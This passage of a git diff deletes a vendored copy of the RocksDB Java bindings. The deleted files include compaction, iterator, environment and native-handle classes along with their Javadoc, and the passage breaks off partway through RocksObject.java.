-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle)
-      throws RocksDBException {
-    compactRange(nativeHandle_, false, -1, 0,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(ColumnFamilyHandle)}</li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, boolean, int, int)}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[],
-   *   boolean, int, int)}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] begin, final byte[] end) throws RocksDBException {
-    compactRange(nativeHandle_, begin, begin.length, end, end.length,
-        false, -1, 0, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(ColumnFamilyHandle)}</li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[])}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[],
-   *   boolean, int, int)}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle,
-      final boolean reduce_level, final int target_level,
-      final int target_path_id) throws RocksDBException {
-    compactRange(nativeHandle_, reduce_level, target_level,
-        target_path_id, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * <p>Range compaction of column family.</p>
-   * <p><strong>Note</strong>: After the database has been compacted,
-   * all data will have been pushed down to the last level containing
-   * any data.</p>
-   *
-   * <p>Compaction outputs should be placed in options.db_paths
-   * [target_path_id]. Behavior is undefined if target_path_id is
-   * out of range.</p>
-   *
-   * <p><strong>See also</strong></p>
-   * <ul>
-   * <li>{@link #compactRange(ColumnFamilyHandle)}</li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, boolean, int, int)}
-   * </li>
-   * <li>
-   *   {@link #compactRange(ColumnFamilyHandle, byte[], byte[])}
-   * </li>
-   * </ul>
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance.
-   * @param begin start of key range (included in range)
-   * @param end end of key range (excluded from range)
-   * @param reduce_level reduce level after compaction
-   * @param target_level target level to compact to
-   * @param target_path_id the target path id of output path
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void compactRange(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] begin, final byte[] end, final boolean reduce_level,
-      final int target_level, final int target_path_id)
-      throws RocksDBException {
-    compactRange(nativeHandle_, begin, begin.length, end, end.length,
-        reduce_level, target_level, target_path_id,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * This function will wait until all currently running background processes
-   * finish. After it returns, no background process will be run until
-   * {@link #continueBackgroundWork()} is called
-   *
-   * @throws RocksDBException If an error occurs when pausing background work
-   */
-  public void pauseBackgroundWork() throws RocksDBException {
-    pauseBackgroundWork(nativeHandle_);
-  }
-
-  /**
-   * Resumes backround work which was suspended by
-   * previously calling {@link #pauseBackgroundWork()}
-   *
-   * @throws RocksDBException If an error occurs when resuming background work
-   */
-  public void continueBackgroundWork() throws RocksDBException {
-    continueBackgroundWork(nativeHandle_);
-  }
-
-  /**
-   * <p>The sequence number of the most recent transaction.</p>
-   *
-   * @return sequence number of the most
-   *     recent transaction.
-   */
-  public long getLatestSequenceNumber() {
-    return getLatestSequenceNumber(nativeHandle_);
-  }
-
-  /**
-   * <p>Prevent file deletions. Compactions will continue to occur,
-   * but no obsolete files will be deleted. Calling this multiple
-   * times have the same effect as calling it once.</p>
-   *
-   * @throws RocksDBException thrown if operation was not performed
-   *     successfully.
-   */
-  public void disableFileDeletions() throws RocksDBException {
-    disableFileDeletions(nativeHandle_);
-  }
-
-  /**
-   * <p>Allow compactions to delete obsolete files.
-   * If force == true, the call to EnableFileDeletions()
-   * will guarantee that file deletions are enabled after
-   * the call, even if DisableFileDeletions() was called
-   * multiple times before.</p>
-   *
-   * <p>If force == false, EnableFileDeletions will only
-   * enable file deletion after it's been called at least
-   * as many times as DisableFileDeletions(), enabling
-   * the two methods to be called by two threads
-   * concurrently without synchronization
-   * -- i.e., file deletions will be enabled only after both
-   * threads call EnableFileDeletions()</p>
-   *
-   * @param force boolean value described above.
-   *
-   * @throws RocksDBException thrown if operation was not performed
-   *     successfully.
-   */
-  public void enableFileDeletions(final boolean force)
-      throws RocksDBException {
-    enableFileDeletions(nativeHandle_, force);
-  }
-
-  /**
-   * <p>Returns an iterator that is positioned at a write-batch containing
-   * seq_number. If the sequence number is non existent, it returns an iterator
-   * at the first available seq_no after the requested seq_no.</p>
-   *
-   * <p>Must set WAL_ttl_seconds or WAL_size_limit_MB to large values to
-   * use this api, else the WAL files will get
-   * cleared aggressively and the iterator might keep getting invalid before
-   * an update is read.</p>
-   *
-   * @param sequenceNumber sequence number offset
-   *
-   * @return {@link org.rocksdb.TransactionLogIterator} instance.
-   *
-   * @throws org.rocksdb.RocksDBException if iterator cannot be retrieved
-   *     from native-side.
-   */
-  public TransactionLogIterator getUpdatesSince(final long sequenceNumber)
-      throws RocksDBException {
-    return new TransactionLogIterator(
-        getUpdatesSince(nativeHandle_, sequenceNumber));
-  }
-
-  public void setOptions(final ColumnFamilyHandle columnFamilyHandle,
-                         final MutableColumnFamilyOptions mutableColumnFamilyOptions)
-          throws RocksDBException {
-    setOptions(nativeHandle_, columnFamilyHandle.nativeHandle_,
-            mutableColumnFamilyOptions.getKeys(),
-            mutableColumnFamilyOptions.getValues());
-  }
-
-  private long[] toNativeHandleList(final List<? extends RocksObject> objectList) {
-    final int len = objectList.size();
-    final long[] handleList = new long[len];
-    for (int i = 0; i < len; i++) {
-      handleList[i] = objectList.get(i).nativeHandle_;
-    }
-    return handleList;
-  }
-
-  /**
-   * ingestExternalFile will load a list of external SST files (1) into the DB
-   * We will try to find the lowest possible level that the file can fit in, and
-   * ingest the file into this level (2). A file that have a key range that
-   * overlap with the memtable key range will require us to Flush the memtable
-   * first before ingesting the file.
-   *
-   * (1) External SST files can be created using {@link SstFileWriter}
-   * (2) We will try to ingest the files to the lowest possible level
-   * even if the file compression doesn't match the level compression
-   *
-   * @param filePathList The list of files to ingest
-   * @param ingestExternalFileOptions the options for the ingestion
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  public void ingestExternalFile(final List<String> filePathList,
-      final IngestExternalFileOptions ingestExternalFileOptions)
-      throws RocksDBException {
-    ingestExternalFile(nativeHandle_, getDefaultColumnFamily().nativeHandle_,
-        filePathList.toArray(new String[filePathList.size()]),
-        filePathList.size(), ingestExternalFileOptions.nativeHandle_);
-  }
-
-  /**
-   * ingestExternalFile will load a list of external SST files (1) into the DB
-   * We will try to find the lowest possible level that the file can fit in, and
-   * ingest the file into this level (2). A file that have a key range that
-   * overlap with the memtable key range will require us to Flush the memtable
-   * first before ingesting the file.
-   *
-   * (1) External SST files can be created using {@link SstFileWriter}
-   * (2) We will try to ingest the files to the lowest possible level
-   * even if the file compression doesn't match the level compression
-   *
-   * @param columnFamilyHandle The column family for the ingested files
-   * @param filePathList The list of files to ingest
-   * @param ingestExternalFileOptions the options for the ingestion
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *     native library.
-   */
-  public void ingestExternalFile(final ColumnFamilyHandle columnFamilyHandle,
-      final List<String> filePathList,
-      final IngestExternalFileOptions ingestExternalFileOptions)
-      throws RocksDBException {
-    ingestExternalFile(nativeHandle_, columnFamilyHandle.nativeHandle_,
-        filePathList.toArray(new String[filePathList.size()]),
-        filePathList.size(), ingestExternalFileOptions.nativeHandle_);
-  }
-
-  /**
-   * Private constructor.
-   *
-   * @param nativeHandle The native handle of the C++ RocksDB object
-   */
-  protected RocksDB(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  // native methods
-  protected native static long open(final long optionsHandle,
-      final String path) throws RocksDBException;
-
-  /**
-   * @param optionsHandle Native handle pointing to an Options object
-   * @param path The directory path for the database files
-   * @param columnFamilyNames An array of column family names
-   * @param columnFamilyOptions An array of native handles pointing to
-   *                            ColumnFamilyOptions objects
-   *
-   * @return An array of native handles, [0] is the handle of the RocksDB object
-   *   [1..1+n] are handles of the ColumnFamilyReferences
-   *
-   * @throws RocksDBException thrown if the database could not be opened
-   */
-  protected native static long[] open(final long optionsHandle,
-      final String path, final byte[][] columnFamilyNames,
-      final long[] columnFamilyOptions) throws RocksDBException;
-
-  protected native static long openROnly(final long optionsHandle,
-      final String path) throws RocksDBException;
-
-  /**
-   * @param optionsHandle Native handle pointing to an Options object
-   * @param path The directory path for the database files
-   * @param columnFamilyNames An array of column family names
-   * @param columnFamilyOptions An array of native handles pointing to
-   *                            ColumnFamilyOptions objects
-   *
-   * @return An array of native handles, [0] is the handle of the RocksDB object
-   *   [1..1+n] are handles of the ColumnFamilyReferences
-   *
-   * @throws RocksDBException thrown if the database could not be opened
-   */
-  protected native static long[] openROnly(final long optionsHandle,
-      final String path, final byte[][] columnFamilyNames,
-      final long[] columnFamilyOptions
-  ) throws RocksDBException;
-
-  protected native static byte[][] listColumnFamilies(long optionsHandle,
-      String path) throws RocksDBException;
-  protected native void put(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength)
-      throws RocksDBException;
-  protected native void put(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength,
-      long cfHandle) throws RocksDBException;
-  protected native void put(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength) throws RocksDBException;
-  protected native void put(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength, long cfHandle) throws RocksDBException;
-  protected native void write0(final long handle, long writeOptHandle,
-      long wbHandle) throws RocksDBException;
-  protected native void write1(final long handle, long writeOptHandle,
-      long wbwiHandle) throws RocksDBException;
-  protected native boolean keyMayExist(final long handle, final byte[] key,
-      final int keyOffset, final int keyLength,
-      final StringBuilder stringBuilder);
-  protected native boolean keyMayExist(final long handle, final byte[] key,
-      final int keyOffset, final int keyLength, final long cfHandle,
-      final StringBuilder stringBuilder);
-  protected native boolean keyMayExist(final long handle,
-      final long optionsHandle, final byte[] key, final int keyOffset,
-      final int keyLength, final StringBuilder stringBuilder);
-  protected native boolean keyMayExist(final long handle,
-      final long optionsHandle, final byte[] key, final int keyOffset,
-      final int keyLength, final long cfHandle,
-      final StringBuilder stringBuilder);
-  protected native void merge(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength)
-      throws RocksDBException;
-  protected native void merge(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength,
-      long cfHandle) throws RocksDBException;
-  protected native void merge(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength) throws RocksDBException;
-  protected native void merge(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength, long cfHandle) throws RocksDBException;
-  protected native int get(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength)
-      throws RocksDBException;
-  protected native int get(long handle, byte[] key, int keyOffset,
-      int keyLength, byte[] value, int valueOffset, int valueLength,
-      long cfHandle) throws RocksDBException;
-  protected native int get(long handle, long readOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength) throws RocksDBException;
-  protected native int get(long handle, long readOptHandle, byte[] key,
-      int keyOffset, int keyLength, byte[] value, int valueOffset,
-      int valueLength, long cfHandle) throws RocksDBException;
-  protected native byte[][] multiGet(final long dbHandle, final byte[][] keys,
-      final int[] keyOffsets, final int[] keyLengths);
-  protected native byte[][] multiGet(final long dbHandle, final byte[][] keys,
-      final int[] keyOffsets, final int[] keyLengths,
-      final long[] columnFamilyHandles);
-  protected native byte[][] multiGet(final long dbHandle, final long rOptHandle,
-      final byte[][] keys, final int[] keyOffsets, final int[] keyLengths);
-  protected native byte[][] multiGet(final long dbHandle, final long rOptHandle,
-      final byte[][] keys, final int[] keyOffsets, final int[] keyLengths,
-      final long[] columnFamilyHandles);
-  protected native byte[] get(long handle, byte[] key, int keyOffset,
-      int keyLength) throws RocksDBException;
-  protected native byte[] get(long handle, byte[] key, int keyOffset,
-      int keyLength, long cfHandle) throws RocksDBException;
-  protected native byte[] get(long handle, long readOptHandle,
-      byte[] key, int keyOffset, int keyLength) throws RocksDBException;
-  protected native byte[] get(long handle, long readOptHandle, byte[] key,
-      int keyOffset, int keyLength, long cfHandle) throws RocksDBException;
-  protected native void delete(long handle, byte[] key, int keyOffset,
-      int keyLength) throws RocksDBException;
-  protected native void delete(long handle, byte[] key, int keyOffset,
-      int keyLength, long cfHandle) throws RocksDBException;
-  protected native void delete(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength) throws RocksDBException;
-  protected native void delete(long handle, long writeOptHandle, byte[] key,
-      int keyOffset, int keyLength, long cfHandle) throws RocksDBException;
-  protected native void singleDelete(
-      long handle, byte[] key, int keyLen) throws RocksDBException;
-  protected native void singleDelete(
-      long handle, byte[] key, int keyLen, long cfHandle)
-      throws RocksDBException;
-  protected native void singleDelete(
-      long handle, long writeOptHandle,
-      byte[] key, int keyLen) throws RocksDBException;
-  protected native void singleDelete(
-      long handle, long writeOptHandle,
-      byte[] key, int keyLen, long cfHandle) throws RocksDBException;
-  protected native void deleteRange(long handle, byte[] beginKey, int beginKeyOffset,
-      int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength)
-      throws RocksDBException;
-  protected native void deleteRange(long handle, byte[] beginKey, int beginKeyOffset,
-      int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength, long cfHandle)
-      throws RocksDBException;
-  protected native void deleteRange(long handle, long writeOptHandle, byte[] beginKey,
-      int beginKeyOffset, int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength)
-      throws RocksDBException;
-  protected native void deleteRange(long handle, long writeOptHandle, byte[] beginKey,
-      int beginKeyOffset, int beginKeyLength, byte[] endKey, int endKeyOffset, int endKeyLength,
-      long cfHandle) throws RocksDBException;
-  protected native String getProperty0(long nativeHandle,
-      String property, int propertyLength) throws RocksDBException;
-  protected native String getProperty0(long nativeHandle, long cfHandle,
-      String property, int propertyLength) throws RocksDBException;
-  protected native long getLongProperty(long nativeHandle, String property,
-      int propertyLength) throws RocksDBException;
-  protected native long getLongProperty(long nativeHandle, long cfHandle,
-      String property, int propertyLength) throws RocksDBException;
-  protected native long iterator(long handle);
-  protected native long iterator(long handle, long readOptHandle);
-  protected native long iteratorCF(long handle, long cfHandle);
-  protected native long iteratorCF(long handle, long cfHandle,
-      long readOptHandle);
-  protected native long[] iterators(final long handle,
-      final long[] columnFamilyHandles, final long readOptHandle)
-      throws RocksDBException;
-  protected native long getSnapshot(long nativeHandle);
-  protected native void releaseSnapshot(long nativeHandle, long snapshotHandle);
-  @Override protected final native void disposeInternal(final long handle);
-  private native long getDefaultColumnFamily(long handle);
-  private native long createColumnFamily(final long handle,
-      final byte[] columnFamilyName, final long columnFamilyOptions)
-      throws RocksDBException;
-  private native void dropColumnFamily(long handle, long cfHandle)
-      throws RocksDBException;
-  private native void flush(long handle, long flushOptHandle)
-      throws RocksDBException;
-  private native void flush(long handle, long flushOptHandle, long cfHandle)
-      throws RocksDBException;
-  private native void compactRange0(long handle, boolean reduce_level,
-      int target_level, int target_path_id) throws RocksDBException;
-  private native void compactRange0(long handle, byte[] begin, int beginLen,
-      byte[] end, int endLen, boolean reduce_level, int target_level,
-      int target_path_id) throws RocksDBException;
-  private native void compactRange(long handle, boolean reduce_level,
-      int target_level, int target_path_id, long cfHandle)
-      throws RocksDBException;
-  private native void compactRange(long handle, byte[] begin, int beginLen,
-      byte[] end, int endLen, boolean reduce_level, int target_level,
-      int target_path_id, long cfHandle) throws RocksDBException;
-  private native void pauseBackgroundWork(long handle) throws RocksDBException;
-  private native void continueBackgroundWork(long handle) throws RocksDBException;
-  private native long getLatestSequenceNumber(long handle);
-  private native void disableFileDeletions(long handle) throws RocksDBException;
-  private native void enableFileDeletions(long handle, boolean force)
-      throws RocksDBException;
-  private native long getUpdatesSince(long handle, long sequenceNumber)
-      throws RocksDBException;
-  private native void setOptions(long handle, long cfHandle, String[] keys,
-      String[] values) throws RocksDBException;
-  private native void ingestExternalFile(long handle, long cfHandle,
-      String[] filePathList, int filePathListLen,
-      long ingest_external_file_options_handle) throws RocksDBException;
-  protected DBOptionsInterface options_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDBException.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDBException.java
deleted file mode 100644
index 8b035f4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDBException.java
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * A RocksDBException encapsulates the error of an operation.  This exception
- * type is used to describe an internal error from the c++ rocksdb library.
- */
-public class RocksDBException extends Exception {
-
-  /* @Nullable */ private final Status status;
-
-  /**
-   * The private construct used by a set of public static factory method.
-   *
-   * @param msg the specified error message.
-   */
-  public RocksDBException(final String msg) {
-    this(msg, null);
-  }
-
-  public RocksDBException(final String msg, final Status status) {
-    super(msg);
-    this.status = status;
-  }
-
-  public RocksDBException(final Status status) {
-    super(status.getState() != null ? status.getState()
-        : status.getCodeString());
-    this.status = status;
-  }
-
-  /**
-   * Get the status returned from RocksDB
-   *
-   * @return The status reported by RocksDB, or null if no status is available
-   */
-  public Status getStatus() {
-    return status;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksEnv.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksEnv.java
deleted file mode 100644
index 8fe61fd..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksEnv.java
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>A RocksEnv is an interface used by the rocksdb implementation to access
- * operating system functionality like the filesystem etc.</p>
- *
- * <p>All Env implementations are safe for concurrent access from
- * multiple threads without any external synchronization.</p>
- */
-public class RocksEnv extends Env {
-
-  /**
-   * <p>Package-private constructor that uses the specified native handle
-   * to construct a RocksEnv.</p>
-   *
-   * <p>Note that the ownership of the input handle
-   * belongs to the caller, and the newly created RocksEnv will not take
-   * the ownership of the input handle.  As a result, calling
-   * {@code dispose()} of the created RocksEnv will be no-op.</p>
-   */
-  RocksEnv(final long handle) {
-    super(handle);
-    disOwnNativeHandle();
-  }
-
-  /**
-   * <p>The helper function of {@link #dispose()} which all subclasses of
-   * {@link RocksObject} must implement to release their associated C++
-   * resource.</p>
-   *
-   * <p><strong>Note:</strong> this class is used to use the default
-   * RocksEnv with RocksJava. The default env allocation is managed
-   * by C++.</p>
-   */
-  @Override
-  protected final void disposeInternal(final long handle) {
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIterator.java
deleted file mode 100644
index 9e9c648..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIterator.java
+++ /dev/null
@@ -1,64 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>An iterator that yields a sequence of key/value pairs from a source.
- * Multiple implementations are provided by this library.
- * In particular, iterators are provided
- * to access the contents of a Table or a DB.</p>
- *
- * <p>Multiple threads can invoke const methods on an RocksIterator without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same RocksIterator must use
- * external synchronization.</p>
- *
- * @see org.rocksdb.RocksObject
- */
-public class RocksIterator extends AbstractRocksIterator<RocksDB> {
-  protected RocksIterator(RocksDB rocksDB, long nativeHandle) {
-    super(rocksDB, nativeHandle);
-  }
-
-  /**
-   * <p>Return the key for the current entry.  The underlying storage for
-   * the returned slice is valid only until the next modification of
-   * the iterator.</p>
-   *
-   * <p>REQUIRES: {@link #isValid()}</p>
-   *
-   * @return key for the current entry.
-   */
-  public byte[] key() {
-    assert(isOwningHandle());
-    return key0(nativeHandle_);
-  }
-
-  /**
-   * <p>Return the value for the current entry.  The underlying storage for
-   * the returned slice is valid only until the next modification of
-   * the iterator.</p>
-   *
-   * <p>REQUIRES: !AtEnd() &amp;&amp; !AtStart()</p>
-   * @return value for the current entry.
-   */
-  public byte[] value() {
-    assert(isOwningHandle());
-    return value0(nativeHandle_);
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native boolean isValid0(long handle);
-  @Override final native void seekToFirst0(long handle);
-  @Override final native void seekToLast0(long handle);
-  @Override final native void next0(long handle);
-  @Override final native void prev0(long handle);
-  @Override final native void seek0(long handle, byte[] target, int targetLen);
-  @Override final native void status0(long handle) throws RocksDBException;
-
-  private native byte[] key0(long handle);
-  private native byte[] value0(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIteratorInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
deleted file mode 100644
index 12fdbb1..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksIteratorInterface.java
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Defines the interface for an Iterator which provides
- * access to data one entry at a time. Multiple implementations
- * are provided by this library.  In particular, iterators are provided
- * to access the contents of a DB and Write Batch.</p>
- *
- * <p>Multiple threads can invoke const methods on an RocksIterator without
- * external synchronization, but if any of the threads may call a
- * non-const method, all threads accessing the same RocksIterator must use
- * external synchronization.</p>
- *
- * @see org.rocksdb.RocksObject
- */
-public interface RocksIteratorInterface {
-
-  /**
-   * <p>An iterator is either positioned at an entry, or
-   * not valid.  This method returns true if the iterator is valid.</p>
-   *
-   * @return true if iterator is valid.
-   */
-  boolean isValid();
-
-  /**
-   * <p>Position at the first entry in the source.  The iterator is Valid()
-   * after this call if the source is not empty.</p>
-   */
-  void seekToFirst();
-
-  /**
-   * <p>Position at the last entry in the source.  The iterator is
-   * valid after this call if the source is not empty.</p>
-   */
-  void seekToLast();
-
-  /**
-   * <p>Position at the first entry in the source whose key is that or
-   * past target.</p>
-   *
-   * <p>The iterator is valid after this call if the source contains
-   * a key that comes at or past target.</p>
-   *
-   * @param target byte array describing a key or a
-   *               key prefix to seek for.
-   */
-  void seek(byte[] target);
-
-  /**
-   * <p>Moves to the next entry in the source.  After this call, Valid() is
-   * true if the iterator was not positioned at the last entry in the source.</p>
-   *
-   * <p>REQUIRES: {@link #isValid()}</p>
-   */
-  void next();
-
-  /**
-   * <p>Moves to the previous entry in the source.  After this call, Valid() is
-   * true if the iterator was not positioned at the first entry in source.</p>
-   *
-   * <p>REQUIRES: {@link #isValid()}</p>
-   */
-  void prev();
-
-  /**
-   * <p>If an error has occurred, return it.  Else return an ok status.
-   * If non-blocking IO is requested and this operation cannot be
-   * satisfied without doing some IO, then this returns Status::Incomplete().</p>
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *                          native library.
-   */
-  void status() throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMemEnv.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMemEnv.java
deleted file mode 100644
index d18d0ce..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMemEnv.java
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksDB memory environment.
- */
-public class RocksMemEnv extends Env {
-
-  /**
-   * <p>Creates a new RocksDB environment that stores its data
-   * in memory and delegates all non-file-storage tasks to
-   * base_env. The caller must delete the result when it is
-   * no longer needed.</p>
-   *
-   * <p>{@code *base_env} must remain live while the result is in use.</p>
-   */
-  public RocksMemEnv() {
-    super(createMemEnv());
-  }
-
-  private static native long createMemEnv();
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMutableObject.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMutableObject.java
deleted file mode 100644
index e92289d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksMutableObject.java
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksMutableObject is an implementation of {@link AbstractNativeReference}
- * whose reference to the underlying native C++ object can change.
- *
- * <p>The use of {@code RocksMutableObject} should be kept to a minimum, as it
- * has synchronization overheads and introduces complexity. Instead it is
- * recommended to use {@link RocksObject} where possible.</p>
- */
-public abstract class RocksMutableObject extends AbstractNativeReference {
-
-  /**
-   * An mutable reference to the value of the C++ pointer pointing to some
-   * underlying native RocksDB C++ object.
-   */
-  private long nativeHandle_;
-  private boolean owningHandle_;
-
-  protected RocksMutableObject() {
-  }
-
-  protected RocksMutableObject(final long nativeHandle) {
-    this.nativeHandle_ = nativeHandle;
-    this.owningHandle_ = true;
-  }
-
-  /**
-   * Closes the existing handle, and changes the handle to the new handle
-   *
-   * @param newNativeHandle The C++ pointer to the new native object
-   * @param owningNativeHandle true if we own the new native object
-   */
-  public synchronized void resetNativeHandle(final long newNativeHandle,
-      final boolean owningNativeHandle) {
-    close();
-    setNativeHandle(newNativeHandle, owningNativeHandle);
-  }
-
-  /**
-   * Sets the handle (C++ pointer) of the underlying C++ native object
-   *
-   * @param nativeHandle The C++ pointer to the native object
-   * @param owningNativeHandle true if we own the native object
-   */
-  public synchronized void setNativeHandle(final long nativeHandle,
-      final boolean owningNativeHandle) {
-    this.nativeHandle_ = nativeHandle;
-    this.owningHandle_ = owningNativeHandle;
-  }
-
-  @Override
-  protected synchronized boolean isOwningHandle() {
-    return this.owningHandle_;
-  }
-
-  /**
-   * Gets the value of the C++ pointer pointing to the underlying
-   * native C++ object
-   *
-   * @return the pointer value for the native object
-   */
-  protected synchronized long getNativeHandle() {
-    assert (this.nativeHandle_ != 0);
-    return this.nativeHandle_;
-  }
-
-  @Override
-  public synchronized final void close() {
-    if (isOwningHandle()) {
-      disposeInternal();
-      this.owningHandle_ = false;
-      this.nativeHandle_ = 0;
-    }
-  }
-
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  protected abstract void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksObject.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksObject.java
deleted file mode 100644
index 545dd89..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksObject.java
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * RocksObject is an implementation of {@link AbstractNativeReference} which
- * has an immutable and therefore thread-safe reference to the underlying
- * native C++ RocksDB object.
- * <p>
- * RocksObject is the base-class of almost all RocksDB classes that have a
- * pointer to some underlying native C++ {@code rocksdb} object.</p>
- * <p>
- * The use of {@code RocksObject} should always be preferred over
- * {@link RocksMutableObject}.</p>
- */
-public abstract class RocksObject extends AbstractImmutableNativeReference {
-
-  /**
-   * An immutable reference to the value of the C++ pointer pointing to some
